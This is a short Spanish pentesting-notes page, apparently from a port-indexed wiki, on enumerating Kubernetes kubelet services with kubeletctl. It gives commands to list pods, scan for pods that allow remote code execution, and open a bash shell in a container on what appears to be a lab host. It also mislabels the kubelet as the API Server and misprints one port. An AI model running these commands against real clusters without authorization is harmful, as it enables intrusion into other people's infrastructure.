10249,10250,10256 - Kubernetes API

Si te encuentras los puertos 10249, 102450 y 10256 y el servicio pone --> InfluxDB API seguramente te estés enfrentando al nodo princial de kubernetes el API Server que es llamado Kubelet.

Enumeración con kubeletctl

LogoGitHub - cyberark/kubeletctl: A client for kubeletGitHub
Herramienta para kubelet enumeration

Con la herramienta de arriba podemos enumerar los pods, escanear los nodos, leer los logs de determinado nodo y ejecutar comandos si tenemos permisos en un pod.

Ejemplos

./kubeletctl_linux_amd64 -s 10.10.11.133 pods # enumerar pods
./kubeletctl_linux_amd64 -s 10.10.11.133 scan rce # comprobar si tenemos permisos de ejecución en algun pod
./kubeletctl_linux_amd64 -s 10.10.11.133 -p <pod> -c <container> exec "bash" # ejecutar comandos en cierto pod
Previous8443 - KubernetesNext27017,27020 - MongoDB

Last updated